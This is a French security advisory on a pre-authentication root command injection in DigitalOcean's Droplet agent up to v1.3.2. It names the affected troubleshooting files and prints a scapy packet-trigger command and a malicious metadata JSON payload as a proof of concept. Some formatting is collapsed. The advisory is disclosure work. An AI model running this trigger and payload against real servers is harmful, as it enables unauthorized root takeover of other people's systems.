
# RCE racine critique avant authentification (CVSS 10.0) dans l'agent DigitalOcean Droplet jusqu'à la v1.3.2 via injection de commande.
RCE racine critique pré-authentification (CVSS 10.0) dans l'agent Droplet de DigitalOcean jusqu'à la v1.3.2 via injection de commande.
Une vulnérabilité critique d'injection de commande a été découverte dans l'agent Droplet de DigitalOcean (toutes les versions jusqu'à la 1.3.2 incluse). Cette faille permet à un attaquant d'obtenir une exécution de code à distance (RCE) avec privilèges root sans aucune authentification.
Découvreur : Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research
La vulnérabilité existe dans le composant actionneur de dépannage :
internal/troubleshooting/actioner/actioner.gointernal/troubleshooting/command/exec.goL'agent traite les métadonnées du service local () et exécute les commandes du tableau sans assainissement approprié.
169.254.169.254TroubleshootingAgent.RequestingL'agent est déclenché par un paquet TCP spécifique vers le port 22 :
Déclencher la récupération :
python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"
Charge utile de métadonnées malveillantes :
{
"troubleshooting_agent": {
"requesting": ["command:id > /tmp/pwned"]
}
}
Impact Score CVSS : 10.0 (Critique)
Privilèges requis : Aucun
Résultat : Compromission totale du système (accès root)
